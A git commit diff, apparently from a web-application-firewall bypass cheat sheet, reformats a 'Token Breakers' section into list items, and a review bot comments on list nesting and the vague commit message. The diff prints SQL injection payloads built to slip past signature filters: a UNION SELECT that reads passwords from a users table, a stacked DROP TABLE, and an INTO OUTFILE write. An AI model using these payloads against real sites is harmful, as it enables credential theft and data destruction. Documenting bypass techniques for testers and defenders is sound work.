Added stuff follow up update

This commit is contained in:
0xInfection 2019-06-21 21:07:30 +05:30
parent b4afef22b6
commit 179eda145d

@ -2475,12 +2475,12 @@ __13. Token Breakers__
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
__Case__: Unknown Token for the Tokenizer
__Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
- __Case__: Unknown Token for the Tokenizer
- __Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
__Payload 1__: `?id=123);DROP TABLE users --`
__Payload 2__: `?id=1337) INTO OUTFILE xxx --`
- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
- __Payload 1__: `?id=123);DROP TABLE users --`
- __Payload 2__: `?id=1337) INTO OUTFILE xxx --`
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
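
Review bot: the added `- __Case__` and `- __Payload__` lines all sit at the same list level as the two definition bullets above them, so a payload is not visually tied to the case it belongs to. Consider nesting each payload item under its case item (indent the `- __Payload ...__` lines by two spaces) so the rendered list reads as case, then payloads. The commit message "Added stuff follow up update" also does not say that this is a formatting-only change to the Token Breakers section; a subject line naming the section and the list conversion would make the history easier to search.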